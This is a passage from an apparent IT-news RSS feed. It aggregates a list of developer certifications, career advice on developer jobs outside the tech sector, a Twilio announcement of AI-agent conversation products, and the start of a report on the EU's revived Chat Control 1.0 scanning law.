<p class="wp-block-paragraph">Employers today “care far less about whether someone has passed an exam and far more about whether they can apply knowledge effectively in real-world situations, leverage AI tools, and solve complex problems,” Miller says. “A certification might get someone an interview, but being able to demonstrate problem-solving skills, teamwork, and adaptability will really make them stand out.”</p>



<h2 class="wp-block-heading">Popular programming certifications</h2>



<p class="wp-block-paragraph">The following certifications consistently rose to the top in my conversations with tech leaders and hiring managers.</p>



<h3 class="wp-block-heading">AWS Certified Developer—Associate</h3>



<p class="wp-block-paragraph">Showcases skills and knowledge in developing, optimizing, packaging, and deploying applications, using CI/CD workflows, and identifying and resolving application issues, according to AWS. This certification is said to be a good starting point on the AWS certification journey for professionals in IT or cloud developer job roles.</p>



<h3 class="wp-block-heading">Azure Developer Associate</h3>



<p class="wp-block-paragraph">This certificate from Microsoft is intended for developers participating in all phases of cloud development, including design, deployment, maintenance, and monitoring. The course teaches developers how to create end-to-end solutions in Microsoft Azure, using the Microsoft Learn Sandbox environment to access Azure resources and services.</p>



<h3 class="wp-block-heading">Certified Kubernetes Application Developer (CKAD)</h3>



<p class="wp-block-paragraph">This certification was created by the Linux Foundation and Cloud Native Computing Foundation. It demonstrates that candidates can design, build, and deploy cloud-native applications for Kubernetes.</p>



<h3 class="wp-block-heading">Certified Secure Software Lifecycle Professional (CSSLP)</h3>



<p class="wp-block-paragraph">This certification, from ISC2, focuses on secure software development practices. It recognizes leading application security skills and demonstrates advanced technical skills and knowledge needed for authentication, authorization, and auditing throughout the software development lifecycle.</p>



<h3 class="wp-block-heading">Databricks Certified Machine Learning Professional</h3>



<p class="wp-block-paragraph">Professionals learn about the latest data and AI techniques and how they can use the Databricks Data Intelligence Platform to build a variety of solutions across data engineering, data warehousing, data science, and AI.</p>



<h3 class="wp-block-heading">Professional Cloud Architect</h3>



<p class="wp-block-paragraph">This certification from Google assesses the ability to design and plan a cloud solution architecture, manage and provision the cloud solution infrastructure, design for security and compliance, analyze and optimize technical and business processes manage implementations of cloud architecture, and ensure solution and operations reliability.</p>



<h3 class="wp-block-heading">Terraform Associate</h3>



<p class="wp-block-paragraph">This certification from HashiCorp is for cloud engineers specializing in operations, IT, or development who know the basic concepts and skills associated with Terraform. It validates foundational skills in using <a href="https://www.infoworld.com/article/3893387/how-terraform-is-evolving-infrastructure-as-code.html">Terraform</a> for <a href="https://www.infoworld.com/article/2259359/what-is-infrastructure-as-code-automating-your-infrastructure-builds.html">infrastructure as code</a> development.</p>
</div></div></div>
</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersecurity Skills for Resume: Top Skills to List]]></title>
<description><![CDATA[Securing a modern digital infrastructure requires a lot more than just knowing technical terms. Companies face constant attacks, which explains why employers increasingly screen resumes for cybersecurity capabilities. When you apply for a role, HR managers look for a specific balance. They expect...]]></description>
<link>https://tsecurity.de/de/3665381/it-security-nachrichten/cybersecurity-skills-for-resume-top-skills-to-list/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3665381/it-security-nachrichten/cybersecurity-skills-for-resume-top-skills-to-list/</guid>
<pubDate>Mon, 13 Jul 2026 15:24:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div class="hs-featured-image-wrapper"> 
 <a href="https://www.cm-alliance.com/cybersecurity-blog/cybersecurity-skills-for-resume-top-skills-to-list" title="" class="hs-featured-image-link"> <img src="https://www.cm-alliance.com/hubfs/Top_Cybersecurity_Skills_with_bgc.webp" alt="Top Cybersecurity Skills" class="hs-featured-image"> </a> 
</div> 
<p>Securing a modern digital infrastructure requires a lot more than just knowing technical terms. Companies face constant attacks, which explains why employers increasingly screen resumes for cybersecurity capabilities. When you apply for a role, HR managers look for a specific balance. They expect deep technical knowledge. They also want clear evidence that you can apply it under pressure. Adding the right cybersecurity skills for resume optimization means showing exactly how you solve practical problems.<br></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Where the software development jobs are now]]></title>
<description><![CDATA[While many technology companies have slowed hiring or even launched significant layoffs, that doesn’t mean job opportunities have dried up for software developers. In fact, skilled developers—particularly those with knowledge of AI—are in demand in other industries.



The key to success for deve...]]></description>
<link>https://tsecurity.de/de/3664782/ai-nachrichten/where-the-software-development-jobs-are-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664782/ai-nachrichten/where-the-software-development-jobs-are-now/</guid>
<pubDate>Mon, 13 Jul 2026 11:33:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>While many technology companies have slowed hiring or even launched <a href="https://www.trueup.io/layoffs" data-type="link" data-id="https://www.trueup.io/layoffs">significant layoffs</a>, that doesn’t mean job opportunities have dried up for software developers. In fact, skilled developers—particularly those with <a href="https://www.infoworld.com/article/4025073/9-ai-development-skills-tech-companies-want.html" data-type="link" data-id="https://www.infoworld.com/article/4025073/9-ai-development-skills-tech-companies-want.html">knowledge of AI</a>—are in demand in other industries.</p>



<p>The key to success for developers looking to snatch up these roles is to be well-prepared to meet the needs of potential employers in a variety of sectors.</p>



<p>“The demand for developers in non-tech sectors is real and growing, but the roles look different from what you’d find at a software company,” says <a href="https://drexel.edu/cci/about/directory/A/Awasthi-Pragati/" data-type="link" data-id="https://drexel.edu/cci/about/directory/A/Awasthi-Pragati/">Pragati Awasthi</a>, assistant teaching professor of AI and data science at Drexel University.</p>



<p>“Across all these sectors, the common thread is that software is no longer a support function; it is embedded in core operations,” Awasthi says. “The developer in these environments is often the person translating domain-specific business problems into technical solutions, which requires a different profile than a pure product engineer at a tech firm.”</p>



<h2 class="wp-block-heading">Opportunity knocks</h2>



<p>The tech industry has long been a mainstay as far as employing software developers. But as these businesses trim staffs in efforts to cut expenses, that has impacted the hiring landscape. Even as the tech sector scales back, however, companies in industries such as financial services/fintech, healthcare/healthtech, retail/ecommerce, and manufacturing are looking to acquire programming talent.</p>



<p>“The unifying factor is data complexity,” Awasthi says. “These industries generate large volumes of sensitive, regulated, or operationally critical data, and they need developers who can build and maintain systems that handle it responsibly.”</p>



<p>While recruiting firm Summit Search Group has placed developers in roles with technology companies, “it is just as common to recruit them for roles outside this niche,” says <a href="https://www.linkedin.com/in/matterhard/" data-type="link" data-id="https://www.linkedin.com/in/matterhard/">Matt Erhard</a>, managing partner at the company. “There are actually a fairly wide variety of roles available for developers in industries beyond tech,” Erhard says.</p>



<p>For example, in financial services Summit Search Group has seen significant hiring for back-end and data engineers who can build and maintain fraud detection systems, digital banking platforms, and regulatory tools, Erhard says. In healthcare, companies are hiring developers to build AI-driven diagnostics platforms and patient portals, or to work with systems that manage electronic health records, he says.</p>



<p>In manufacturing and industrial companies, developers are needed for systems integration and embedded software related to predictive maintenance, <a href="https://www.networkworld.com/article/963923/what-is-iot-the-internet-of-things-explained.html" data-type="link" data-id="https://www.networkworld.com/article/963923/what-is-iot-the-internet-of-things-explained.html">Internet of Things</a> (IoT) systems, and smart factories. And in retail and ecommerce, there’s strong demand for <a href="https://www.infoworld.com/article/2259033/full-stack-developer-what-it-is-and-how-you-can-become-one.html" data-type="link" data-id="https://www.infoworld.com/article/2259033/full-stack-developer-what-it-is-and-how-you-can-become-one.html">full-stack developers</a> and data developers who can handle logistics systems, omni-channel platforms, and personalization engines, Erhard says.</p>



<p>“One significant function where we’ve been placing developer talent lately is in developing business systems and internal applications,” Erhard says. These roles often have titles such as systems engineer or application developer, and professionals are hired to handle tasks such as customizing customer relationship management (CRM) or enterprise resource planning (ERP) platforms, building workflow automation tools or modernizing legacy systems, he says.</p>



<p>Other core functions for which Summit Search Group has placed a lot of developers include data, analytics, and AI-enablement. “That could be directly involved with <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">data engineering</a> or in building tools like reporting systems and <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">ETL [extract, transform, load]</a> pipelines,” Erhard says.</p>



<p>The firm also has handled searches for developers who can build and maintain customer-facing products for banking, healthcare, and retail companies, such as mobile apps or digital platforms customers can use to interact with companies.</p>



<p>Randstad Digital, a provider of global technology talent, sees demand for roles including web developers, system developers, and app developers. “These professionals would work on anything from customer-facing platforms to internal tools,” says <a href="https://www.linkedin.com/in/mpmorris36/" data-type="link" data-id="https://www.linkedin.com/in/mpmorris36/">Michael Morris</a>, global head of platform and talent at the company. “Non-tech companies are also often hiring roles like software architecture and <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html" data-type="link" data-id="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">devops</a> to help scale existing technology. These involve being more ingrained in the business, like building a supply chain system for a retailer, rather than creating individual tech products like you would at a technology company.”</p>



<h2 class="wp-block-heading">Prep for success</h2>



<p>To increases the chances of success at landing developer jobs outside of the tech industry, development professionals would be wise to follow some good practices.</p>



<h3 class="wp-block-heading">Boost AI skills</h3>



<p>One best practice is to boost skills in using AI-powered tools and get familiar with all things AI.</p>



<p>“Get fluent with AI-assisted development and its limits,” Awasthi says. “This is not optional. Organizations across every sector expect developers to use AI coding tools productively. But the more durable skill is knowing when AI output is wrong, incomplete, or unsuitable for a regulated context. That critical evaluation capacity is what non-tech employers are increasingly trying to hire.”</p>



<p>AI does not necessarily replace the need for human developers so much as it changes the skills profile for those roles, Erhard says. “The biggest difference in recent years is that AI literacy is now a non-negotiable,” he says. “At minimum, developers today need to understand concepts like <a href="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html" data-type="link" data-id="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html">prompt engineering</a> and how to use AI tools to improve their efficiency.”</p>



<p>One thing many job candidates don’t expect is that the rise of AI has also increased the importance of high-level skills such as problem framing, system design, and cross-functional communication,” Erhard says. “Essentially, if something is related to development but too complex or nuanced for an AI to handle effectively, then the demand is high for human developers who have that expertise,” he says.</p>



<p>Candidates who land roles consistently have experience building AI-augmented workflows along with standard coding skills, Erhard says. “Employers increasingly expect to hire developers who can leverage AI, so demonstrating this experience on your résumé can be very beneficial,” he says.</p>



<h3 class="wp-block-heading">Gain domain knowledge</h3>



<p>Summit Search Group is seeing high demand for developers with deep domain knowledge in an organization’s specific industry. “So, for instance, if someone is both an experienced developer and has expertise in healthcare compliance, or financial regulations, then those candidates tend to be very sought after,” Erhard says.</p>



<p>Domain fluency is an underrated skill, Awasthi says. “A developer who understands healthcare compliance, financial regulation, or manufacturing process logic is significantly harder to replace than one who only writes clean code,” she says. “AI can generate boilerplate. It cannot navigate a HIPAA audit or explain a model’s output to a compliance officer.”</p>



<p>Development professionals should “pick an industry and learn it seriously; not just the technology stack but the regulatory environment, the business model, and the actual problems practitioners face,” Awasthi says. “A developer who has read about HIPAA, or spent time understanding credit risk, is immediately more valuable in those hiring contexts.”</p>



<p>It’s also vital to demonstrate real-world, practical application of skills, not just credentials. “The strongest candidates have projects in their portfolio that directly tie to and solve real business problems,” Erhard says.</p>



<h3 class="wp-block-heading">Acquire soft skills</h3>



<p>And then there are the soft skills that are becoming more of a differentiator than they were in the past. As AI handles more routine coding, human developers are expected to make more architectural decisions and collaborate across departments, Erhard says. “Strong communication and problem-solving skills are critical for many of the developer roles that we’re filling today,” he says.</p>



<p>While technical skills are still relevant for developers using and managing AI tools, “they also need to develop the skill of ‘deeper thinking’ and learn how to think one step ahead,” Morris says. “This includes skills like system design mastery—understanding the macro view and learning how <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html" data-type="link" data-id="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a>, databases, and third-party APIs interact securely and efficiently.”</p>



<p>They also should become deeply fluent in the AI coding tools commonly used in their particular industry, with a strong understanding of how to prompt them for optimal output, Morris says. Product context awareness is also useful. “AI doesn’t know what the customer wants, but you do,” Morris says. “Understanding the business problem and the end-user experience is a requirement for being able to guide LLMs.”</p>



<h3 class="wp-block-heading">Master debugging and incident response</h3>



<p>Developers looking to break into non-tech sectors also should develop skills in debugging and incident response, Morris says. “Complex systems with multiple AI agents can, and will, fail, which means companies need humans to trace logic flaws to get the system back on track,” he says. “A mastery of root-cause analysis is a critical skill.”</p>



<p>“Security, compliance, and reliability are very important in non-tech industries like finance and healthcare,” says <a href="https://www.linkedin.com/in/rohit-agarwal/" data-type="link" data-id="https://www.linkedin.com/in/rohit-agarwal/">Rohit Agarwal</a>, co-founder of Zenius, a remote hiring company. “So employers want developers who also know regulatory environments well.”</p>



<h3 class="wp-block-heading">Network and keep learning</h3>



<p>To successfully pivot from jobs at tech companies, “continuous learning, upskilling, and building hybrid skills that combine technical and business knowledge are essential,” Morris says. “With the right preparation, tech professionals can adapt and continue to thrive in meaningful, dynamic careers.”</p>



<p>It’s also a good idea to join talent communities in fields of interest and “engage with other members in conversations that increase your knowledge through the collective intelligence of the community,” Morris says. “Take advantage of AI skilling opportunities relevant for your role, or better yet, where you want to go next. Experiment with the technology either on your own or through structured programs.” Ultimately, be curious and proactive, he says.</p>



<p>“I’d also recommend developers not to ignore referrals, direct outreach, and industry-specific communities during job search,” Agarwal says. “There are often a lot more opportunities available than the ones posted online.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Infrastructure for the agentic era: A new conversation layer for the Twilio Platform]]></title>
<description><![CDATA[A new era of customer engagement is taking shape. AI agents are quickly becoming integral to the way businesses serve, support, and sell to customers — able to respond, reason, and take action in ways that go far beyond scripted automation.



Many customer journeys, however, are still built on s...]]></description>
<link>https://tsecurity.de/de/3664598/it-security-nachrichten/infrastructure-for-the-agentic-era-a-new-conversation-layer-for-the-twilio-platform/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664598/it-security-nachrichten/infrastructure-for-the-agentic-era-a-new-conversation-layer-for-the-twilio-platform/</guid>
<pubDate>Mon, 13 Jul 2026 10:09:19 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>A new era of customer engagement is taking shape. AI agents are quickly becoming integral to the way businesses serve, support, and sell to customers — able to respond, reason, and take action in ways that go far beyond scripted automation.</p>



<p>Many customer journeys, however, are still built on systems that don’t talk to each other. Customer data lives in one place, channel history in another, and AI agents often operate with only part of the picture. Customers feel the pain when they switch between channels like voice and messaging, get transferred, and have to repeat themselves yet again. It doesn’t matter that they’ve been loyal to a brand for years, every interaction feels like a cold start. That is the conversation gap.</p>



<p>It’s clear that AI isn’t the problem, infrastructure is. Closing the gap requires new building blocks that focus on continuity, so context can carry forward across systems, channels, human agents, and AI agents.</p>



<p>To bridge the gap, at <a href="https://signal.twilio.com/?_gl=1*qsec1h*_gcl_aw*R0NMLjE3Nzk3MTY4MzguQ2p3S0NBanc1c19RQmhBZEVpd0FERF9nQnUyRVR4YTdGTFRCNDVPcktsd2dvbnZrQ3hZdlNtQXRJRHVoS09lOVJySXFsQ3k2eHZZajBob0NRZkVRQXZEX0J3RQ..*_gcl_au*MTAwMjE5MDU2OS4xNzc5MzUyNjYz*_ga*MTA5NDA4OTEuMTc3MTU2MTMzNg..*_ga_RRP8K4M4F3*czE3ODA5NzUwMjYkbzE3NyRnMSR0MTc4MDk3NzU4NiRqNjAkbDAkaDA.&amp;utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">SIGNAL 2026</a>, we are introducing a new conversation layer for the Twilio Platform.</p>



<p>Twilio Conversation Orchestrator, Twilio Conversation Memory, and Twilio Conversation Intelligence are now generally available. Together, they help businesses coordinate interactions, preserve context, and connect human and AI agents so every conversation is more continuous and useful.</p>



<p>In addition to the new Conversations layer, we’re also announcing platform updates that make it easier to build, manage, and scale customer engagement on Twilio — from a reimagined Twilio Console to expanded channels and new voice AI capabilities.</p>



<h2 class="wp-block-heading">New building blocks for connected conversations</h2>



<p>The conversation gap does more than create inconsistent customer experiences. It hurts conversion and retention, increases operational costs, adds integration complexity, and makes agents less productive. The new platform capabilities we’re introducing are designed to fix that by coordinating interactions, maintaining context, and surfacing signals as conversations happen.</p>



<h2 class="wp-block-heading"><a></a>Conversation Orchestrator</h2>



<p><a href="https://www.twilio.com/en-us/blog/products/conversation-orchestrator?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">Conversation Orchestrator</a> helps businesses coordinate interactions across Twilio channels without complex custom logic. Teams can configure it in Console or configure their implementation with the API. It connects interactions into a single thread and manages handoffs between human agents and automated systems.</p>



<h2 class="wp-block-heading">Conversation Memory</h2>



<p><a href="https://www.twilio.com/en-us/blog/products/launches/conversation-memory?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Conversation Memory</a> creates a living, identity-resolved profile by connecting customer data with conversation history and customer traits. That means each interaction starts with the right context. It’s built specifically for LLMs to reduce latency and token usage by surfacing the most relevant details when they matter.</p>



<p>A new Enterprise Knowledge API (now generally available) also allows teams to deliver more relevant experiences and ground interactions in trusted business knowledge such as FAQs, policies, and product documentation.</p>



<h2 class="wp-block-heading">Conversation Intelligence</h2>



<p><a href="https://www.twilio.com/en-us/blog/products/launches/conversation-intelligence?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Conversation Intelligence</a> provides real-time understanding of live interactions. Using prebuilt and custom LLM-based operators, it can detect changes in sentiment, flag potential escalations, and trigger action during a conversation, not only after it ends.</p>



<p>That gives teams the ability to respond sooner, support agents more effectively, and improve customer outcomes while the conversation is still in progress.</p>



<p>Together, these products help businesses create customer experiences that feel more connected across channels.</p>



<h2 class="wp-block-heading">Open by design</h2>



<p>Twilio remains neutral by design. We start with the premise that you know your business. We aren’t here to prescribe a model, framework, or data strategy. We provide the infrastructure that helps you build customer engagement in the way that works best for your business. You pick the model and agent runtime. You own the data.</p>



<p>That doesn’t mean you need to start from scratch, either. We partnered with Microsoft, AWS, and others to create blueprints that support faster development. We are also introducing an open-source developer toolkit, <a href="https://www.twilio.com/en-us/blog/products/launches/agent-connect?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Twilio Agent Connect</a> (now generally available), that lets your teams connect agents built on any LLM or framework directly to Twilio’s infrastructure.</p>



<p>For developers, this means more flexibility. For businesses, it means less lock-in and the ability to get value from existing investments. For partners, it means more ways to build with Twilio.</p>



<h2 class="wp-block-heading">A new front door</h2>



<p>We are also introducing a reimagined <a href="https://www.twilio.com/en-us/blog/products/launches/new-twilio-console?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Twilio Console</a>, because as customer engagement grows more complex, managing the infrastructure behind it should feel effortless.</p>



<p>The new Console is a single mission control center that brings your communications, identity, and data into one experience: one login, consistent logs across every surface, an intelligent Console Assistant, transparent billing insights, and streamlined compliance workflows that no longer slow you down.</p>



<p>Over the coming months, we’ll roll out this new Console experience to customers automatically. You can also opt in to gain early access.</p>



<h2 class="wp-block-heading">More channels, more control, smarter conversations</h2>



<p>In addition to these launches, we are announcing several updates that expand customer reach, support enterprise requirements, and make it simpler to build on Twilio.</p>



<ul class="wp-block-list">
<li><a href="https://www.twilio.com/en-us/messaging/channels/apple-messages-for-business?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">Apple Messages for Business</a> (Private beta) and Twilio Email (GA) give teams new ways to reach customers on the channels they already use.</li>



<li>Data Residency for SMS (EU) (Public beta) enables teams to manage personal data locally to support regional data requirements.</li>



<li><a href="https://www.twilio.com/en-us/blog/products/launches/the-evolution-of-conversation-relay?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">Conversation Relay</a> enhancements add PCI compliance, HIPAA eligibility, Insights, and support for Deepgram Flux for smarter turn detection — helping AI agents better understand when a person has finished speaking.</li>



<li><a href="https://www.twilio.com/en-us/blog/partners/integrations/provision-twilio-communications-channels-stripe-projects?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_infra-agentic-era_brandposthub" target="_blank" rel="sponsored">Stripe Projects integration</a> enables developers and AI agents to seamlessly provision Twilio within Stripe Projects in a single, programmable CLI workflow.</li>
</ul>



<h2 class="wp-block-heading">Built with our customers</h2>



<p>Bringing these new products to life required a close partnership with many beta customers and partners. This helped us understand real-world signals and needs to help make the capabilities robust from the start.</p>



<p>Among dozens of others, Centerfield, Constellation Dealerships, Car Finance 247, and Meera.ai leveraged Twilio to solve their own customer engagement challenges. These teams showed what is possible when businesses carry context forward, act on live conversation signals, and connect AI agents with human teams in the moments that matter.</p>



<p><a href="https://www.carfinance247.co.uk/" target="_blank" rel="noreferrer noopener">Car Finance 247</a>, a leading UK online car finance broker, is using Twilio to help recover stalled loan applications. When customers miss a field, need to correct information, or still need to confirm terms and conditions, AI-powered outreach across voice, SMS, and RCS, Conversation Memory tracks the application state. Conversation Orchestrator manages the outreach journey, and Flex helps bring in a human agent as needed. As Reg Rix, Co-Founder and CEO, shared:</p>



<p><em>“Because the platform remembers where each customer left off, we can pick up right where they stopped, helping them cross the finish line in a way that is modern, responsive, and genuinely helpful.”</em></p>



<p><a href="https://www.centerfield.com/" target="_blank" rel="sponsored">Centerfield</a>, a technology company powering AI-driven commerce, helps brands connect with consumers across digital and phone-based journeys. With Twilio, the team is connecting real-time conversation data with customer context to guide agents and AI systems in the moment, standardise what works, and improve performance at scale. As Aniketh Parmar, Chief Technology Officer, said:</p>



<p><em>“Performance comes down to how well every interaction moves a customer forward. We’re capturing each conversation in real time and applying what we already know about the customer to guide our agents and AI systems in the moment. With the Twilio Platform, including Conversation Orchestrator, Conversation Memory, and Conversation Intelligence, we can see what’s driving conversations so we can standardise what works, eliminate what doesn’t, and continuously improve outcomes at scale.”</em></p>



<p><a href="https://constellationdealer.com/" target="_blank" rel="sponsored">Constellation Dealerships</a> is using Twilio’s agent infrastructure to accelerate AI-powered engagement across its dealer network, moving from evaluation to measurable outcomes in days. As Richard Pineault, Director of R&amp;D, shared:</p>



<p><em>“The value of this partnership is evident—our team progressed from evaluating Twilio’s agent infrastructure to realising measurable outcomes within days. This rapid speed-to-value exemplifies the agility and innovation required to propel the dealership industry into the future.”</em></p>



<p><a href="http://meera.ai/" target="_blank" rel="sponsored">Meera.ai </a>is building on Twilio to modernise outbound engagement, replacing repeated manual follow-ups with always-on conversations across voice, SMS, and messaging. Vivek Zaveri, Chief Executive Officer, said:</p>



<p><em>“Meera.ai has partnered with Twilio since our inception to champion a conversation-first future for commerce. As the industry shifts toward real-time LLM-enabled interactions, Twilio’s Platform and the new Conversations products will help us reach customers in the moment.”</em></p>



<p>Together, these customers and partners show that the Twilio Platform can help businesses recover stalled journeys, improve live interactions, accelerate time to value, and create more connected experiences across AI agents, human teams, and every customer channel.</p>



<h2 class="wp-block-heading">The next era of customer engagement starts here</h2>



<p>As AI agents own more of customer engagement, businesses need infrastructure that keeps conversations connected across channels, systems, and teams. That means preserving context, coordinating handoffs, and acting on what is happening in real time.</p>



<p>That is what we are building with this next generation of the Twilio Platform: a new layer that connects channels, context, intelligence, and human and AI agents, helping businesses make every digital interaction more connected, more useful, and more amazing.</p>



<p>For 17 years, Twilio has helped builders create better ways for businesses to connect with their customers. In this next era, that connection matters more than ever.</p>



<p><a href="https://www.twilio.com/en-us/why-twilio?utm_source=foundry&amp;utm_medium=contentsyn&amp;utm_campaign=abm_brand_icp_sa_aw_tofu_apac_en&amp;utm_content=abm_lo_cs_ungatedcontent_end-cta-infra-agentic-era_brandposthub" target="_blank" rel="noreferrer noopener">Explore the new Conversations layer</a>, try the products, and let’s build what comes next, together.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[European Parliament Revives Controversial Chat Scanning Law]]></title>
<description><![CDATA[The Chat Control 1.0 framework has been revived after the European Parliament voted to restore the legal basis that allows major technology companies to voluntarily scan users' private communications for Child Sexual Abuse Material (CSAM). The decision, taken on July 9, comes months after the tem...]]></description>
<link>https://tsecurity.de/de/3664301/it-security-nachrichten/european-parliament-revives-controversial-chat-scanning-law/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664301/it-security-nachrichten/european-parliament-revives-controversial-chat-scanning-law/</guid>
<pubDate>Mon, 13 Jul 2026 07:37:04 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1536" height="1024" src="https://thecyberexpress.com/wp-content/uploads/Chat-Control-1.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Chat Control" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Chat-Control-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-1140x760.webp 1140w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1.webp 1536w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-300x200.webp 300w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-1024x683.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-768x512.webp 768w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-600x400.webp 600w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-150x100.webp 150w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-750x500.webp 750w, https://thecyberexpress.com/wp-content/uploads/Chat-Control-1-1140x760.webp 1140w" sizes="(max-width: 1536px) 100vw, 1536px" title="European Parliament Revives Controversial Chat Scanning Law 1"></p><p class="PDq2pG_selectionAnchorContainer" data-start="372" data-end="824">The Chat Control 1.0 framework has been revived after the <a href="https://thecyberexpress.com/european-parliament-data-breach/" target="_blank" rel="noopener">European Parliament</a> voted to restore the legal basis that allows major technology companies to voluntarily scan users' private communications for <a href="https://thecyberexpress.com/eu-csam-law-gap-child-sexual-exploitation-risk/" target="_blank" rel="noopener">Child Sexual Abuse Material</a> (CSAM). The decision, taken on July 9, comes months after the temporary regulation expired in April and has reignited debate over privacy, surveillance, and the future of online safety laws in the <a href="https://thecyberexpress.com/enisa-and-commission/" target="_blank" rel="noopener">European Union</a>.</p>
<p data-start="826" data-end="1186">The vote was held on the final sitting day before the Parliament's summer recess. Under an urgent legislative procedure, rejecting the proposal required an absolute majority of all Members of the European Parliament rather than a simple majority of those present. As a result, the proposal passed despite more lawmakers present voting against it than in favor.</p>

<h3 data-section-id="1jb6ks5" data-start="1188" data-end="1244"><strong><span role="text">Chat Control 1.0 Restores Voluntary CSAM Scanning</span></strong></h3>
<p data-start="1246" data-end="1501">The revived regulation, formally known as Regulation (EU) 2021/1232, provides the legal basis for online platforms to voluntarily scan private communications for known and new Child Sexual Abuse Material (CSAM) as well as the solicitation of children.</p>
<p data-start="1503" data-end="1727">The original regulation was introduced in 2021 as a temporary derogation from the ePrivacy Directive. It expired in April after lawmakers failed to agree on a long-term replacement amid widespread concerns over user <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-privacy/" title="privacy" data-wpil-keyword-link="linked" data-wpil-monitor-id="28928">privacy</a>.</p>
<p data-start="1729" data-end="2047">Although several technology companies continued voluntary scanning after the regulation lapsed, European authorities had warned that doing so without a legal basis could expose platforms to legal uncertainty. The restored framework does not authorize scanning on end-to-end encrypted messaging services such as Signal.</p>

<h3 data-section-id="1sydelx" data-start="2049" data-end="2084"><strong>Urgent Procedure Draws Criticism</strong></h3>
